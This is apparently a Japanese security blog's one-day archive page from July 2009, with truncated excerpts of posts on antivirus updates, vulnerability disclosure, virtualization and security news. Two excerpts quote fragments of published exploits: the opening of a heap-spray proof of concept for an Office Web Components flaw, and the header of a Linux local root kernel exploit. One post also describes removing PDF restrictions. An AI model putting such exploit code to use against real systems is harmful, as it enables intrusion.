2009-07-21から1日間の記事一覧
無償版のでいいんじゃないの?!っていわれた気もするが、無償版はハッシュ値のメンテナンスだけで、大きな技術革新は見えない。 一方商用では、McAfee、Trendmicro、Symantec共にクラウドという名前のハッシュ値をネットサーバ側で検証するサービスを開始し…
ボットはプロキシを超えられない。今はそうらしいです、ふーん。 最近、ボット(不正プログラムの一種)はプロキシーに対応できていないので、透過型プロキシーではなく明示型プロキシーを使えば、少なくとも社内から外部の指令サーバーへアクセスすることを…
「セキュリティ間に合ってます!」 自社のソフトやWebサイトに脆弱性があるという連絡を受けたとき、あなたや会社は適切に対処できるだろうか? 過去には、連絡をくれた人を不正アクセス者や恐喝者のように扱ったり、無視してトラブルになった例もある。 そ…
MicrosoftがHyper-VでLinuxを最適化するためのドライバをGPLで配布との事。 提供したのはWindows Server 2008およびWindows Server 2008 R2のHyper-V上で稼働するLinux OSの性能を高めることを目的とした3つのデバイスドライバーで、GNU General Public Lice…
HPの検疫、100MACアドレスで212万ですか・・・結構するなぁ。 同製品は、ネットワークに接続される前にPCの認証と検疫を行い、セキュリティポリシーと照らして隔離や検査、治療を実施する。最新版では外部記録メディアの制御や、アプリケーション監視による…
VMwareがモバイル端末向けの仮想化技術を発表との事。30KBで動くのか?! ヴイエムウェア株式会社は7月21日、携帯電話端末向け仮想化プラットフォーム「VMware Mobile Virtualization Platform(以下、VMware MVP)」に関する記者向け説明会を開催。来日した…
論文完成のためと、個人情報漏洩・・・ 今野氏も,診療データは病院内のしかるべき場所で厳重に管理し,院外への持ち出しを原則として禁止すべきだと考えている。罰則も含めた規定を設け,個人情報の取り扱いにかかわる誓約書を医師に求めた。だが,医師たち…
XPS Document Writerを使った、セキュリティ権限上昇の方法(とかいうw XPS Document Writerを利用して、PDFファイルのセキュリティを外す方法 Webサイト上で公開されているPDFファイルには「セキュリティ」が掛けられていて、「文書に関する制限」の「許可…
すげぇ、jjencodeをapacheのmod_ext_filterに組み込んじゃったとの事、すげぇ。 jjencode素晴らしいですね。記号だけでjavascriptが実行出来てしまいます。 何かに使えないかなーと考えて、apacheのmod_ext_filterを使ってjavascriptの難読サーブをやってみ…
BSAが組織内違法コピー撲滅の通報件数が過去最多の275件だったとの事。ライセンスの必要性の意識が挙がってきたってことか。 ビジネス ソフトウェア アライアンス(BSA)は21日、BSAが組織内違法コピー撲滅のため開設している情報提供窓口への通報件数が、20…
セキュリティポリシーを前者にわたって設定?!できるそうです。設定を戻すことも出来るみたいですね。 セキュリティ管理者は、絶えず寄せられる設定変更要求への対応に苦労しています。SmartWorkflow を使用すると、全社にわたって一貫性のあるセキュリティ…
Panda ChallengeのHardがダウンロード開始とのこと。 Welcome to the final Panda Challenge. This is the hard one; let's see who can solve it first. In the medium one we had just a few right answers. Carlos has been the creator of this challeng…
マイケル・ジャクソンの訃報を悪用したスパムやTwitterでワームが大量に出ている模様。 マイケル・ジャクソンさんの突然の訃報に世界中が驚いた6月下旬。そんなニュースを悪用したスパムやTwitter上で確認されたワームに注意を、とシマンテックが警告してい…
【日食はネットで】東京の最大は11時12分、皆既食は10時55分前後、ライブ中継情報も満載:RBB NAVi (ブロードバンドコンテンツ 検索サービス) 2009/07/21(情報元のブックマーク数)
明日の日食の件 今回の皆既日食はインド、ネパール、ブータン、中国を経由し、日本では鹿児島県薩南列島付近を横切り、ミクロネシアまで走り抜けていく。日本国内の陸地で皆既日食が観測できるのは46年ぶり。今回もっとも皆既食時間の長い鹿児島県悪石島では…
ふむぅ・・・長かったなぁ・・・ GRAY_Sml 誤検知 の件は、スパイウェアパターン 0.799.00 で収束した模様です。でも、new-spy.txt に記載はないです。(w CPRパターンの 0.798.30 (と 0.800.03 ) に、記載があるので多分この時点で解決したみたいです。 続々…
なんか、アメリカっぽいですね、PC持ち出し禁止ではなく、持ち出し前提で対策を考える。根本を見直すってところか。 近年は紛失や盗難などに伴う情報漏えいを懸念して、PCの社外持ち出しを禁止している企業が多い。PCの持ち出しができれば外出先でも業務がで…
これは、お手上げタイムですね、結構講師にお願いしちゃいますw #1:何らかの応答が返ってくるような質問を投げかける #2:質問に対して、挙手での応答を求める プレゼンテーション中に聴衆を居眠りさせないためのティップス10+選 - ZDNet Japan 言葉で分…
なんとなく面白そう。 第7回(小田原) テーマ:情報管理による業務効率改善と情報セキュリティ 〜遠隔接続の利点・問題点・解決策の実演〜 講師:谷山 亮治 参加費:無料 定員:40名(先着順。定員になり次第締め切り) 日時:2009年11月12日(木)14:00-16…
ぉーーー!勉強会君だ!!!!活用されてる活用されてる!!!ありがとーー!>kwappaさん! 第7回は同大学 助教の山口大輔氏の協力の下、「特別講義」として実施された。同大学の情報系学生をはじめとした「IT業界を目指す学生」向けの講義で、内容は「研修…
そりゃーRuby会議2009のために、来日したんですからね!!!www かずひこさん、目立ちすぎ! http://recompile.net/archives/51215736.html
Trendmicroのパターンがアップしました。 パターン番号:6.297.00 イエローアラートJP/US:JP 迷惑メールがイエロー:5月のPPTパッチ対応、5月のDirectShowのアドバイザリ、5月のAdobe製品脆弱性、2月のFlash脆弱性警告/US 特筆無し アップデート理由:未調…
(振り込め詐欺の親玉?逮捕 - 極楽せきゅあ日記経由) 上野容疑者だそうです(違 5つの振り込め詐欺グループのリーダだったそうで、 警視庁捜査2課によると、上野容疑者は五つの振り込め詐欺グループを統括し、05年春から07年9月にかけ200人以上か…
アドバイザリが出ているOffice Web Componentsの脆弱性のPoCが出ています。 <html> <body> <script language="JavaScript"> var shellcode = unescape("evil code"); var array = new Array(); var ls = 0x81000-(shellcode.length*2); var bigblock = unescape("%u0b0c%u0b0C"); while(bi…</body></html>
SELinuxにLocal root ExploitのZERO-Dayが出ている模様。SELinuxが有効でもだと、まずいみたい。 /* super fun 2.6.30+/RHEL5 2.6.18 local kernel exploit in /dev/net/tun A vulnerability which, when viewed at the source level, is unexploitable! But…
確かにWi-Fiが安全かというとそうとは言い切れない。基本中の基本だが、忘れがちなのでメモ ■夏休みにネットブックを持ち歩く方へのTIPS (1)ネットカフェやWLANを使用しても、オンラインバンキングやネットショッピングは利用しない。 (2)ネットカフェや…
そういえば、150.70.84.44って有名なんですねぇwww。TrendmicroのURLフィルタの確認用のやつですな。 ワタクシがウチの掲示板へ何か書き込みをするたびに、必ず観測してるヤツが居る。 ソイツは[150.70.84.44]というIPアドレスのホストから見てる。 あ…
とりあえずできることは、充電しすぎないと、液晶暗めくらいかな・・・ 1. 充電し過ぎない 2. 液晶画面の設定は暗めにする 3. 撮ってる間は写真を消さない 4. フォーマットが早いメモリーカードを買う 5. センサーの掃除は自分でする 6. 外部フラッシュを使…
会津若松市GJ!!! OpenOffice.orgの導入を進めている会津若松市が、そのノウハウを冊子形式で公開しました。 日経ITpro記事 http://itpro.nikkeibp.co.jp/article/NEWS/20090713/333747/ 「オープンオフィスにしませんか?」 http://www.city.aizuwakama…
SAPのNetWeaverに情報漏洩の脆弱性が存在とのこと。 SAP NetWeaver is prone to an information-disclosure vulnerability because it fails to properly secure communication channels between clients and servers. Successful exploits will allow attac…
uTestというサイトでソフトウエアバグを発見サービスを開始とのこと。XSSとか見つける人には良い小遣い稼ぎですねwww ループス・コミュニケーションズは7月15日、ソフトウェアのバグ(不具合)を発見するサービスを開始したと発表した。技術者1万8000人が…